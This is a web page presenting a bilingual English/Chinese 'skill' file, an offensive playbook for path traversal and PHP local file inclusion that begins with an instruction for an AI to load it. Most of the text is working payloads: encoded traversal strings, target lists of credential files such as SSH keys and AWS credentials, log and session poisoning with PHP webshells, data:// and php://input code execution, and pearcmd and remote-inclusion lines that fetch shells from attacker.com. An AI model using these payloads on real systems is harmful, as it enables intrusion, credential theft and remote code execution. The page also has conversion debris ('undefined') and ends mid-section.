Back to Details

path-traversal-lfi

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: Path Traversal / Local File Inclusion (LFI) — Expert Attack Playbook

SKILL: 路径遍历 / 本地文件包含(LFI) —— 专业攻击作战手册

AI LOAD INSTRUCTION: Expert path traversal and LFI techniques. Covers encoding bypass sequences, OS differences, filter bypass, PHP wrapper exploitation, log poisoning to RCE, and the critical distinction between path traversal (read only) vs LFI (execution). Base models miss encoding chains and RCE escalation paths.
AI加载说明:专业的路径遍历与LFI技术集,涵盖编码绕过序列、操作系统差异、过滤器绕过、PHP wrapper利用、日志投毒实现RCE,以及路径遍历(只读)与LFI(可执行)的核心区别。基础模型通常会遗漏编码链和RCE升级路径。

0. RELATED ROUTING

0. 相关路由指引

Before deep exploitation, you can first load:
  • upload insecure files when the primary attack surface is an upload workflow rather than an include or read primitive
在深度利用之前,你可以先加载:
  • 不安全文件上传 当主要攻击面是上传工作流而非包含或读取原语时使用

First-pass traversal chains

初阶遍历链

text
../etc/passwd
../../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..\\..\\..\\windows\\win.ini
text
../etc/passwd
../../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..\\..\\..\\windows\\win.ini

1. CORE CONCEPT

1. 核心概念

Path Traversal: Read arbitrary files by escaping the intended directory with 
../
sequences. LFI: In PHP, when user input controls 
include()
/
require()
— file is executed as PHP code, not just read.
http://target.com/index.php?page=home
→ Opens: /var/www/html/pages/home.php

Traversal attack:
http://target.com/index.php?page=../../../../etc/passwd
→ Opens: /etc/passwd
路径遍历:通过
../
序列逃逸目标目录,实现任意文件读取。 LFI:在PHP场景中,当用户输入控制
include()
/
require()
时,文件会被作为PHP代码执行,而非仅被读取。
http://target.com/index.php?page=home
→ 打开路径: /var/www/html/pages/home.php

遍历攻击:
http://target.com/index.php?page=../../../../etc/passwd
→ 打开路径: /etc/passwd

2. TRAVERSAL SEQUENCE VARIANTS

2. 遍历序列变体

The filtering strategy determines which encoding to use:
过滤策略决定了要使用的编码方式:

Basic

基础版

../../../etc/passwd
..\..\..\windows\system32\drivers\etc\hosts  (Windows)
../../../etc/passwd
..\..\..\windows\system32\drivers\etc\hosts  (Windows系统)

URL Encoding

URL编码

%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd     ← %2f = '/'
%2e%2e%5c%2e%2e%5c%2e%2e%5c                  ← %5c = '\'
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd     ← %2f = '/'
%2e%2e%5c%2e%2e%5c%2e%2e%5c                  ← %5c = '\'

Double URL Encoding (when server decodes once, filter checks before decode)

双重URL编码(当服务器会解码一次,过滤器在解码前进行校验时使用)

%252e%252e%252f%252e%252e%252f  ← %25 = %, double-encoded %2e
..%252f..%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f  ← %25 = %, 是%2e的双重编码
..%252f..%252fetc%252fpasswd

Unicode / Overlong UTF-8

Unicode / 超长UTF-8编码

..%c0%af..%c0%af     ← overlong UTF-8 encoding of '/'
..%c1%9c..%c1%9c     ← overlong UTF-8 encoding of '\'
..%ef%bc%8f          ← fullwidth solidus '/'
..%c0%af..%c0%af     ← '/'的超长UTF-8编码
..%c1%9c..%c1%9c     ← '\'的超长UTF-8编码
..%ef%bc%8f          ← 全角斜杠'/'

Mixed Encodings

混合编码

..%2F..%2Fetc%2Fpasswd
....//....//etc/passwd   ← double-dot with slash (filter strips single ../)
..%2F..%2Fetc%2Fpasswd
....//....//etc/passwd   ← 带斜杠的双点(过滤器移除单个../后仍保留有效序列)

Filter Strips 
../
(so 
../
becomes 
../
after strip)

过滤器会移除
../
的场景(移除后仍会生成
../

....//          ← becomes ../ after filter strips ../
..././          ← becomes ../ after filter strips ./
....//          ← 过滤器移除../后变为../
..././          ← 过滤器移除./后变为../

Null Byte Injection (legacy PHP < 5.3.4)

空字节注入(适用于旧版本PHP < 5.3.4)

../../../../etc/passwd%00.jpg   ← %00 truncates string, strips .jpg extension
../../../../etc/passwd%00.php
../../../../etc/passwd%00.jpg   ← %00会截断字符串,移除后面的.jpg后缀
../../../../etc/passwd%00.php

3. TARGET FILES AND ESCALATION TARGETS

3. 目标文件与权限升级目标

Linux

Linux系统

/etc/passwd                  ← user list (usernames, UIDs)
/etc/shadow                  ← password hashes (requires root-level file read)
/etc/hosts                   ← internal hostnames → pivot targets
/etc/hostname                ← server hostname
/proc/self/environ           ← process environment (DB creds, API keys!)
/proc/self/cmdline           ← process command line
/proc/self/fd/0              ← stdin file descriptor
/proc/[pid]/maps             ← memory maps (loaded libraries with paths)
/var/log/apache2/access.log  ← for log poisoning
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/auth.log            ← SSH attempt log
/var/mail/www-data            ← email for www-data user
/home/USER/.ssh/id_rsa       ← SSH private key
/home/USER/.ssh/authorized_keys
/home/USER/.bash_history     ← command history (credentials!)
/home/USER/.aws/credentials  ← AWS keys
/tmp/sess_SESSIONID          ← PHP session files (if session.save_path=/tmp)
/etc/passwd                  ← 用户列表(用户名、UID)
/etc/shadow                  ← 密码哈希(需要root级文件读取权限)
/etc/hosts                   ← 内部主机名 → 横向移动目标
/etc/hostname                ← 服务器主机名
/proc/self/environ           ← 进程环境变量(数据库凭证、API密钥!)
/proc/self/cmdline           ← 进程启动命令
/proc/self/fd/0              ← 标准输入文件描述符
/proc/[pid]/maps             ← 内存映射(带路径的已加载库)
/var/log/apache2/access.log  ← 用于日志投毒
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/auth.log            ← SSH尝试日志
/var/mail/www-data            ← www-data用户的邮件
/home/USER/.ssh/id_rsa       ← SSH私钥
/home/USER/.ssh/authorized_keys
/home/USER/.bash_history     ← 命令历史(含凭证!)
/home/USER/.aws/credentials  ← AWS密钥
/tmp/sess_SESSIONID          ← PHP会话文件(如果session.save_path=/tmp)

Web Application Config Files

Web应用配置文件

/var/www/html/.env           ← Laravel/Node.js env vars
/var/www/html/config.php     ← PHP config
/var/www/html/wp-config.php  ← WordPress DB credentials
/etc/apache2/sites-enabled/  ← Apache vhosts
/etc/nginx/sites-enabled/    ← Nginx config
/usr/local/etc/nginx/nginx.conf
/var/www/html/.env           ← Laravel/Node.js环境变量
/var/www/html/config.php     ← PHP配置
/var/www/html/wp-config.php  ← WordPress数据库凭证
/etc/apache2/sites-enabled/  ← Apache虚拟主机配置
/etc/nginx/sites-enabled/    ← Nginx配置
/usr/local/etc/nginx/nginx.conf

Windows

Windows系统

C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\Windows\System32\config\SAM          ← NTLM hashes (often locked)
C:\inetpub\wwwroot\web.config           ← ASP.NET DB connection strings
C:\inetpub\wwwroot\global.asa
C:\xampp\htdocs\wp-config.php
C:\Users\Administrator\.ssh\id_rsa
C:\ProgramData\MySQL\MySQL Server 8\my.ini  ← MySQL config
C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\Windows\System32\config\SAM          ← NTLM哈希(通常被锁定)
C:\inetpub\wwwroot\web.config           ← ASP.NET数据库连接字符串
C:\inetpub\wwwroot\global.asa
C:\xampp\htdocs\wp-config.php
C:\Users\Administrator\.ssh\id_rsa
C:\ProgramData\MySQL\MySQL Server 8\my.ini  ← MySQL配置

4. PHP LFI → RCE TECHNIQUES

4. PHP LFI 转 RCE 技术

Log Poisoning (most reliable when log is accessible)

日志投毒(日志可访问时最可靠的方法)

Step 1: Inject PHP code into Apache/Nginx access log via User-Agent:
http
GET / HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
Step 2: Include the log file via LFI:
?page=../../../../var/log/apache2/access.log&cmd=id
步骤1:通过User-Agent将PHP代码注入Apache/Nginx访问日志:
http
GET / HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
步骤2:通过LFI包含日志文件:
?page=../../../../var/log/apache2/access.log&cmd=id

SSH Log Poisoning

SSH日志投毒

Inject PHP payload as SSH username:
bash
ssh '<?php system($_GET["cmd"]); ?>'@target.com
Then include 
/var/log/auth.log
.
将PHP payload作为SSH用户名注入:
bash
ssh '<?php system($_GET["cmd"]); ?>'@target.com
之后包含
/var/log/auth.log
即可。

PHP Session File Poisoning

PHP会话文件投毒

Step 1: Send PHP code in session-stored parameter (e.g., username), triggering storage in session file Step 2: Include session file:
?page=../../../../tmp/sess_SESSIONID&cmd=id
Find session ID from cookie 
PHPSESSID
.
步骤1:在会话存储的参数(如用户名)中传入PHP代码,触发存储到会话文件 步骤2:包含会话文件:
?page=../../../../tmp/sess_SESSIONID&cmd=id
可从
PHPSESSID
Cookie中获取会话ID。

PHP Wrappers for RCE

用于RCE的PHP Wrappers

php://expect
wrapper (requires 
expect
PHP extension):
?page=expect://id
php://input
wrapper (combine LFI with POST body):
POST ?page=php://input
Body: <?php system('id'); ?>
data://
wrapper (inject PHP directly as base64):
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
(PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4= = 
<?php system($_GET['cmd']); ?>
)
php://expect
wrapper(需要
expect
PHP扩展):
?page=expect://id
php://input
wrapper(结合LFI和POST请求体使用):
POST ?page=php://input
Body: <?php system('id'); ?>
data://
wrapper(直接以base64格式注入PHP代码):
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
(PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4= = 
<?php system($_GET['cmd']); ?>
)

5. PHP FILTER WRAPPER (FILE CONTENT READ)

5. PHP FILTER WRAPPER(文件内容读取)

Use 
php://filter
to base64-encode file content to avoid null bytes, binary data:
?page=php://filter/convert.base64-encode/resource=config.php
?page=php://filter/convert.base64-encode/resource=/etc/passwd
?page=php://filter/read=string.rot13/resource=config.php
?page=php://filter/convert.iconv.UTF-8.UTF-16LE/resource=config.php
Decode the returned base64 to see the file contents (including PHP source code).
Chain filters (multiple transforms to bypass input filters):
?page=php://filter/convert.base64-encode|convert.base64-encode/resource=/etc/passwd
使用
php://filter
将文件内容base64编码,避免空字节、二进制数据的影响:
?page=php://filter/convert.base64-encode/resource=config.php
?page=php://filter/convert.base64-encode/resource=/etc/passwd
?page=php://filter/read=string.rot13/resource=config.php
?page=php://filter/convert.iconv.UTF-8.UTF-16LE/resource=config.php
解码返回的base64即可查看文件内容(包括PHP源代码)。
过滤器链(多次转换绕过输入过滤器):
?page=php://filter/convert.base64-encode|convert.base64-encode/resource=/etc/passwd

6. REMOTE FILE INCLUSION (RFI) — WHEN ENABLED

6. 远程文件包含(RFI) —— 开启时可用

If PHP's 
allow_url_include = On
(rare but exists):
?page=http://attacker.com/shell.txt
?page=ftp://attacker.com/shell.php
Host a 
shell.txt
with 
<?php system($_GET['cmd']); ?>
.
如果PHP的
allow_url_include = On
(少见但存在):
?page=http://attacker.com/shell.txt
?page=ftp://attacker.com/shell.php
在攻击机上托管包含
<?php system($_GET['cmd']); ?>
shell.txt
即可。

7. SERVER-SPECIFIC PATH TRUNCATION

7. 服务器特定路径截断

PHP has a historical path length limit. Pad with 
.
or 
/./
to truncate appended extension:
?page=../../../../etc/passwd/./././././././././././............ (255+ chars)
When server appends 
.php
, the truncation drops it.
Or null byte if PHP < 5.3.4:
?page=../../../../etc/passwd%00
PHP历史版本存在路径长度限制,使用
.
/./
填充来截断追加的后缀:
?page=../../../../etc/passwd/./././././././././././............ (255+ 字符)
当服务器追加
.php
后缀时,截断操作会将其移除。
如果是PHP < 5.3.4也可以使用空字节:
?page=../../../../etc/passwd%00

8. PARAMETER LOCATIONS TO TEST

8. 需要测试的参数位置

?file=        ?page=        ?include=    ?path=
?doc=         ?view=        ?load=       ?read=
?template=    ?lang=        ?url=        ?src=
?content=     ?site=        ?layout=     ?module=
Also test: HTTP headers, cookies, form 
action
values, import/upload features.
?file=        ?page=        ?include=    ?path=
?doc=         ?view=        ?load=       ?read=
?template=    ?lang=        ?url=        ?src=
?content=     ?site=        ?layout=     ?module=
同时还要测试:HTTP头、Cookie、表单
action
值、导入/上传功能。

9. FILTER BYPASS CHECKLIST

9. 过滤器绕过检查清单

When 
../
is stripped or blocked:
□ Try URL encoding: %2e%2e%2f
□ Try double URL encoding: %252e%252e%252f
□ Try overlong UTF-8: ..%c0%af / ..%ef%bc%8f
□ Try mixed: ..%2F or ..%5C (backslash on Linux)
□ Try redundant sequences: ....// or ..././ (strip once → still ../)
□ Try null byte: /../../../etc/passwd%00
□ Try absolute path: /etc/passwd (if no path prefix added)
□ Try Windows UNC (Windows server): \\127.0.0.1\C$\Windows\win.ini
../
被移除或拦截时:
□ 尝试URL编码: %2e%2e%2f
□ 尝试双重URL编码: %252e%252e%252f
□ 尝试超长UTF-8编码: ..%c0%af / ..%ef%bc%8f
□ 尝试混合编码: ..%2F 或 ..%5C(Linux下的反斜杠)
□ 尝试冗余序列: ....// 或 ..././(单次过滤后仍保留../)
□ 尝试空字节: /../../../etc/passwd%00
□ 尝试绝对路径: /etc/passwd(如果没有追加路径前缀)
□ 尝试Windows UNC路径(Windows服务器): \\127.0.0.1\C$\Windows\win.ini

10. IMPACT ESCALATION PATH

10. 影响升级路径

Path traversal (read arbitrary files)
├── Read /etc/passwd → enumerate users
├── Read /proc/self/environ → find API keys, DB passwords in env
├── Read app config files → find credentials → horizontal movement
├── Read SSH private keys → direct server login
└── Find log paths → Log Poisoning → LFI RCE

LFI (PHP code inclusion)
├── Log poisoning → webshell
├── Session file poisoning → webshell  
├── php://input → direct code execution
├── data:// → direct code execution
└── php://filter → read PHP source code → find more vulnerabilities
路径遍历(读取任意文件)
├── 读取/etc/passwd → 枚举用户
├── 读取/proc/self/environ → 查找环境变量中的API密钥、数据库密码
├── 读取应用配置文件 → 查找凭证 → 横向移动
├── 读取SSH私钥 → 直接登录服务器
└── 查找日志路径 → 日志投毒 → LFI转RCE

LFI(PHP代码包含)
├── 日志投毒 → webshell
├── 会话文件投毒 → webshell  
├── php://input → 直接代码执行
├── data:// → 直接代码执行
└── php://filter → 读取PHP源代码 → 发现更多漏洞

11. LFI TO RCE ESCALATION PATHS

11. LFI转RCE升级路径

MethodRequirementsPayload
Log Poisoning (Apache)LFI + Apache access.log readableInject 
<?php system($_GET['c']);?>
in User-Agent → include 
/var/log/apache2/access.log
Log Poisoning (SSH)LFI + SSH auth.log readableSSH as 
<?php system('id');?>@target
→ include 
/var/log/auth.log
Log Poisoning (Mail)LFI + mail log readableSend email with PHP in subject → include 
/var/log/mail.log
/proc/self/fd bruteforceLFI + LinuxBruteforce 
/proc/self/fd/0
through 
/proc/self/fd/255
for open file handles containing injected content
/proc/self/environLFI + CGI/FastCGIInject PHP in 
User-Agent
header → include 
/proc/self/environ
iconv CVE-2024-2961glibc < 2.39, PHP with 
php://filter
php://filter/convert.iconv.UTF-8.ISO-2022-CN-EXT/resource=
chain to heap overflow → RCE. Tool: cnext-exploits
phpinfo() assistedLFI + phpinfo page accessibleRace condition: upload tmp file via multipart to phpinfo → read tmp path from response → include before cleanup
PHP SessionLFI + session file writableInject PHP into session via controllable session variable → include 
/tmp/sess_SESSIONID
or 
/var/lib/php/sessions/sess_SESSIONID
Upload raceLFI + upload endpointUpload PHP file → include before server-side validation/deletion
方法要求Payload
日志投毒(Apache)LFI + Apache access.log可读
<?php system($_GET['c']);?>
注入User-Agent → 包含
/var/log/apache2/access.log
日志投毒(SSH)LFI + SSH auth.log可读
<?php system('id');?>@target
身份发起SSH连接 → 包含
/var/log/auth.log
日志投毒(邮件)LFI + 邮件日志可读发送主题包含PHP代码的邮件 → 包含
/var/log/mail.log
/proc/self/fd暴力破解LFI + Linux系统暴力破解
/proc/self/fd/0
/proc/self/fd/255
,寻找包含注入内容的打开文件句柄
/proc/self/environLFI + CGI/FastCGI将PHP代码注入
User-Agent
头 → 包含
/proc/self/environ
iconv CVE-2024-2961glibc < 2.39, PHP开启
php://filter
php://filter/convert.iconv.UTF-8.ISO-2022-CN-EXT/resource=
链触发堆溢出 → RCE。工具:cnext-exploits
phpinfo()辅助LFI + phpinfo页面可访问竞态条件:通过multipart请求向phpinfo上传临时文件 → 从响应中读取临时路径 → 在文件被清理前包含
PHP SessionLFI + 会话文件可写通过可控会话变量将PHP代码注入会话 → 包含
/tmp/sess_SESSIONID
/var/lib/php/sessions/sess_SESSIONID
上传竞态LFI + 上传端点上传PHP文件 → 在服务器校验/删除前包含

12. PHP WRAPPER EXPLOITATION MATRIX

12. PHP WRAPPER利用矩阵

php://filter (most powerful, always try first)

php://filter(最强大,优先尝试)

text
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
php://filter/convert.iconv.utf-8.utf-16/resource=index.php
php://filter/zlib.deflate/resource=index.php
Filter chain RCE (synacktiv php_filter_chain_generator):
  • Chain multiple 
    convert.iconv
    filters to write arbitrary bytes without file upload
  • Tool: 
    synacktiv/php_filter_chain_generator
    → generates chain that writes PHP code
  • python3 php_filter_chain_generator.py --chain '<?php system("id");?>'
convert.iconv + dechunk oracle (blind file read):
  • Tool: 
    synacktiv/php_filter_chains_oracle_exploit
    (filters_chain_oracle_exploit)
  • Enables blind LFI to read file contents character by character
text
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
php://filter/convert.iconv.utf-8.utf-16/resource=index.php
php://filter/zlib.deflate/resource=index.php
过滤器链RCE(synacktiv php_filter_chain_generator):
  • 串联多个
    convert.iconv
    过滤器无需文件上传即可写入任意字节
  • 工具:
    synacktiv/php_filter_chain_generator
    → 生成写入PHP代码的过滤器链
  • python3 php_filter_chain_generator.py --chain '<?php system("id");?>'
convert.iconv + dechunk oracle(盲注文件读取):
  • 工具:
    synacktiv/php_filter_chains_oracle_exploit
    (filters_chain_oracle_exploit)
  • 支持通过盲LFI逐字符读取文件内容

php://input

php://input

text
POST vulnerable.php?page=php://input
Body: <?php system('id'); ?>
Requires 
allow_url_include=On
text
POST vulnerable.php?page=php://input
Body: <?php system('id'); ?>
需要开启
allow_url_include=On

data://

data://

text
data://text/plain,<?php system('id');?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
data:text/plain,<?php system('id');?>    ← note: no double slash variant also works
text
data://text/plain,<?php system('id');?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
data:text/plain,<?php system('id');?>    ← 注意:无双斜杠的变体也可使用

phar://

phar://

text
phar://uploaded.phar/test.php
Triggers deserialization of phar metadata → RCE via POP chain (requires file upload of crafted phar, can be disguised as JPEG)
text
phar://uploaded.phar/test.php
触发phar元数据反序列化 → 通过POP链实现RCE(需要上传构造好的phar文件,可伪装为JPEG)

zip://

zip://

text
zip://uploaded.zip%23shell.php
text
zip://uploaded.zip%23shell.php

expect://

expect://

text
expect://id
Requires 
expect
extension (rare)
text
expect://id
需要
expect
扩展(少见)

13. PEARCMD LFI EXPLOITATION

13. PEARCMD LFI利用

When 
pearcmd.php
is accessible via LFI (common in Docker PHP images):
MethodPayload
config-create
/?file=pearcmd.php&+config-create+/<?=phpinfo()?>+/tmp/shell.php
man_dir
/?file=pearcmd.php&+-c+/tmp/shell.php+-d+man_dir=<?=phpinfo()?>+-s+
download
/?file=pearcmd.php&+download+http://attacker.com/shell.php
install
/?file=pearcmd.php&+install+http://attacker.com/shell.tgz
pearcmd.php
可通过LFI访问时(Docker PHP镜像中常见):
方法Payload
config-create
/?file=pearcmd.php&+config-create+/<?=phpinfo()?>+/tmp/shell.php
man_dir
/?file=pearcmd.php&+-c+/tmp/shell.php+-d+man_dir=<?=phpinfo()?>+-s+
download
/?file=pearcmd.php&+download+http://attacker.com/shell.php
install
/?file=pearcmd.php&+install+http://attacker.com/shell.tgz

14. WINDOWS-SPECIFIC LFI TECHNIQUES

14. Windows特定LFI技术

FindFirstFile wildcard (Windows only):
  • <
    matches any single character, 
    >
    matches any sequence (similar to 
    ?
    and 
    *
    but in file APIs)
  • php<<
    can match 
    php5
    , 
    phtml
    , etc.
  • ..\..\windows\win.ini
    → use 
    <<
    for fuzzy matching: 
    ..\..\windows\win<<
FindFirstFile通配符(仅Windows支持):
  • <
    匹配任意单个字符,
    >
    匹配任意序列(类似文件API中的
    ?
    *
  • php<<
    可以匹配
    php5
    phtml
  • ..\..\windows\win.ini
    → 使用
    <<
    进行模糊匹配:
    ..\..\windows\win<<

15. PARAMETER NAMING PATTERNS (HIGH-FREQUENCY TARGETS)

15. 参数命名模式(高频目标)

Based on vulnerability research statistical analysis:
Parameter NameFrequencyContext
filename
, 
file
, 
path
Very HighDirect file operations
page
, 
include
, 
template
HighTemplate/page inclusion
url
, 
src
, 
href
HighResource loading
download
, 
read
, 
load
MediumFile download/read
dir
, 
folder
, 
root
MediumDirectory operations
hdfile
, 
inputFile
, 
XFileName
LowCMS/middleware specific
FileUrl
, 
filePath
, 
docPath
LowEnterprise app specific
High-frequency vulnerable endpoints:
down.php
, 
download.jsp
, 
download.asp
, 
readfile.php
, 
file_download.php
, 
getfile.php
, 
view.php
基于漏洞研究统计分析:
参数名称出现频率场景
filename
, 
file
, 
path
极高直接文件操作
page
, 
include
, 
template
模板/页面包含
url
, 
src
, 
href
资源加载
download
, 
read
, 
load
文件下载/读取
dir
, 
folder
, 
root
目录操作
hdfile
, 
inputFile
, 
XFileName
CMS/中间件特定
FileUrl
, 
filePath
, 
docPath
企业应用特定
高频漏洞端点:
down.php
, 
download.jsp
, 
download.asp
, 
readfile.php
, 
file_download.php
, 
getfile.php
, 
view.php

16. LFI TO RCE — ESCALATION PATHS

16. LFI转RCE —— 升级路径

1. /proc/self/fd Brute-Force

1. /proc/self/fd暴力破解

undefined
undefined

When file upload exists but path is unknown:

存在文件上传但路径未知时使用:

Uploaded files get temporary fd in /proc/self/fd/

上传的文件会在/proc/self/fd/下生成临时文件描述符

Brute-force fd numbers:

暴力破解fd编号:

/proc/self/fd/0 through /proc/self/fd/255
/proc/self/fd/0 到 /proc/self/fd/255

Include the temp file before it's cleaned up

在临时文件被清理前包含

undefined
undefined

2. /proc/self/environ Poisoning

2. /proc/self/environ投毒

undefined
undefined

If User-Agent is reflected in process environment:

如果User-Agent会被反射到进程环境中:

GET /vuln.php?page=/proc/self/environ User-Agent: <?php system($_GET['c']); ?>
undefined
GET /vuln.php?page=/proc/self/environ User-Agent: <?php system($_GET['c']); ?>
undefined

3. Log Poisoning

3. 日志投毒

undefined
undefined

Apache access log:

Apache访问日志:

GET /<?php system($_GET['c']); ?> HTTP/1.1
GET /<?php system($_GET['c']); ?> HTTP/1.1

Then include: /var/log/apache2/access.log

之后包含: /var/log/apache2/access.log

SSH auth log (username field):

SSH认证日志(用户名字段):

ssh '<?php system($_GET["c"]); ?>'@target
ssh '<?php system($_GET["c"]); ?>'@target

Then include: /var/log/auth.log

之后包含: /var/log/auth.log

Mail log (SMTP subject):

邮件日志(SMTP主题):

MAIL FROM:attacker@evil.com RCPT TO:victim@target.com DATA Subject: <?php system($_GET['c']); ?> .
MAIL FROM:attacker@evil.com RCPT TO:victim@target.com DATA Subject: <?php system($_GET['c']); ?> .

Then include: /var/log/mail.log

之后包含: /var/log/mail.log

undefined
undefined

4. PHP Session File Poisoning

4. PHP会话文件投毒

undefined
undefined

Set session variable to PHP code:

将会话变量设置为PHP代码:

GET /page.php?lang=<?php system($_GET['c']); ?>
GET /page.php?lang=<?php system($_GET['c']); ?>

Session file: /tmp/sess_PHPSESSID or /var/lib/php/sessions/sess_PHPSESSID

会话文件路径: /tmp/sess_PHPSESSID 或 /var/lib/php/sessions/sess_PHPSESSID

Include the session file

包含该会话文件即可

undefined
undefined

5. phpinfo() Assisted LFI

5. phpinfo()辅助LFI

undefined
undefined

Race condition: upload via phpinfo() temp file

竞态条件:通过phpinfo()临时文件上传

1. POST multipart file to phpinfo() page → reveals tmp_name (/tmp/phpXXXXXX)

1. 向phpinfo()页面POST multipart文件 → 响应中会返回tmp_name(/tmp/phpXXXXXX)

2. Include the temp file before PHP cleans it up

2. 在PHP清理临时文件前包含它

Requires many concurrent requests (race window ~10ms)

需要大量并发请求(竞态窗口约10ms)

undefined
undefined

6. iconv CVE-2024-2961

6. iconv CVE-2024-2961

undefined
undefined

glibc iconv buffer overflow in PHP filter chains

PHP过滤器链中的glibc iconv缓冲区溢出漏洞

Tool: cfreal/cnext-exploits

工具:cfreal/cnext-exploits

Converts LFI to RCE without needing writable paths or log poisoning

无需可写路径或日志投毒即可将LFI转为RCE


---

---

17. PHP WRAPPER EXPLOITATION MATRIX

17. PHP WRAPPER利用矩阵

php://filter (file read without execution)

php://filter(无需执行的文件读取)

undefined
undefined

Base64 encode source code:

Base64编码源代码:

php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=index.php

ROT13:

ROT13编码:

php://filter/read=string.rot13/resource=index.php
php://filter/read=string.rot13/resource=index.php

Chain multiple filters:

串联多个过滤器:

php://filter/convert.iconv.UTF-8.UTF-16/resource=index.php
php://filter/convert.iconv.UTF-8.UTF-16/resource=index.php

Zlib compression:

Zlib压缩:

php://filter/zlib.deflate/resource=index.php
php://filter/zlib.deflate/resource=index.php

NEW: Filter chain RCE (synacktiv php_filter_chain_generator)

新特性:过滤器链RCE(synacktiv php_filter_chain_generator)

Generates chains that write arbitrary content via iconv conversions

通过iconv转换生成可写入任意内容的过滤器链

Tool: synacktiv/php_filter_chain_generator

工具:synacktiv/php_filter_chain_generator

python3 php_filter_chain_generator.py --chain '<?php system($_GET["c"]); ?>'
python3 php_filter_chain_generator.py --chain '<?php system($_GET["c"]); ?>'

Produces: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|...|/resource=php://temp

生成结果示例:php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|...|/resource=php://temp

undefined
undefined

convert.iconv + dechunk Oracle (blind file read)

convert.iconv + dechunk Oracle(盲注文件读取)

undefined
undefined

Error-based oracle: determine if first byte of file matches a character

基于错误的Oracle:判断文件的第一个字节是否匹配指定字符

Tool: synacktiv/php_filter_chains_oracle_exploit

工具:synacktiv/php_filter_chains_oracle_exploit

Reads files byte-by-byte through error/behavior differences

通过错误/行为差异逐字节读取文件

undefined
undefined

data:// Wrapper

data:// Wrapper

undefined
undefined

Execute arbitrary PHP:

执行任意PHP:

data://text/plain,<?php system('id'); ?> data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
data://text/plain,<?php system('id'); ?> data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==

Bypass when data:// is filtered but data: (without //) works:

绕过data://被过滤但data:(无//)可用的场景:

data:text/plain,<?php system('id'); ?>
undefined
data:text/plain,<?php system('id'); ?>
undefined

expect:// Wrapper

expect:// Wrapper

expect://id
expect://ls
expect://id
expect://ls

Requires expect extension (rare but check)

需要expect扩展(少见但需检查)

undefined
undefined

php://input

php://input

POST /vuln.php?page=php://input
Content-Type: application/x-www-form-urlencoded

<?php system('id'); ?>
POST /vuln.php?page=php://input
Content-Type: application/x-www-form-urlencoded

<?php system('id'); ?>

zip:// and phar:// Wrappers

zip:// 和 phar:// Wrappers

undefined
undefined

zip://: Upload ZIP containing PHP file

zip://: 上传包含PHP文件的ZIP压缩包

zip:///tmp/upload.zip#shell.php
zip:///tmp/upload.zip#shell.php

phar://: Triggers deserialization of phar metadata!

phar://: 触发phar元数据反序列化!

phar:///tmp/upload.phar/anything
phar:///tmp/upload.phar/anything

Create malicious phar with crafted metadata object

构造包含恶意元数据对象的phar文件

Can chain to RCE via POP gadget chains (like PHP deserialization)

可通过POP gadget链转为RCE(类似PHP反序列化)

Phar can be disguised as JPG (polyglot phar-jpg)

Phar可伪装为JPG(多格式兼容phar-jpg)

undefined
undefined

wrapwrap (prefix/suffix injection)

wrapwrap(前缀/后缀注入)

undefined
undefined

Tool: ambionics/wrapwrap

工具:ambionics/wrapwrap

Adds arbitrary prefix and suffix to file content via filter chains

通过过滤器链为文件内容添加任意前缀和后缀

Useful for converting file read into XXE, SSRF, or deserialization trigger

适用于将文件读取转为XXE、SSRF或反序列化触发点


---

---

18. PEARCMD LFI TO RCE

18. PEARCMD LFI转RCE

When PEAR is installed and 
register_argc_argv=On
(common in Docker PHP images):
undefined
当安装了PEAR且
register_argc_argv=On
时(Docker PHP镜像中常见):
undefined

Method 1: config-create (write arbitrary content to file)

方法1:config-create(向文件写入任意内容)

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/shell.php
GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/shell.php

Method 2: man_dir (change docs directory to write path)

方法2:man_dir(修改文档目录为写入路径)

GET /index.php?+-c+/tmp/shell.php+-d+man_dir=<?=system($_GET[0])?>+-s+/usr/local/lib/php/pearcmd.php
GET /index.php?+-c+/tmp/shell.php+-d+man_dir=<?=system($_GET[0])?>+-s+/usr/local/lib/php/pearcmd.php

Method 3: download (fetch remote file)

方法3:download(拉取远程文件)

GET /index.php?+download+http://attacker.com/shell.php&file=/usr/local/lib/php/pearcmd.php
GET /index.php?+download+http://attacker.com/shell.php&file=/usr/local/lib/php/pearcmd.php

Method 4: install (install remote package)

方法4:install(安装远程包)

GET /index.php?+install+http://attacker.com/evil.tgz&file=/usr/local/lib/php/pearcmd.php
undefined
GET /index.php?+install+http://attacker.com/evil.tgz&file=/usr/local/lib/php/pearcmd.php
undefined

Windows FindFirstFile Wildcard

Windows FindFirstFile通配符

undefined
undefined

Windows << and > wildcards in file paths:

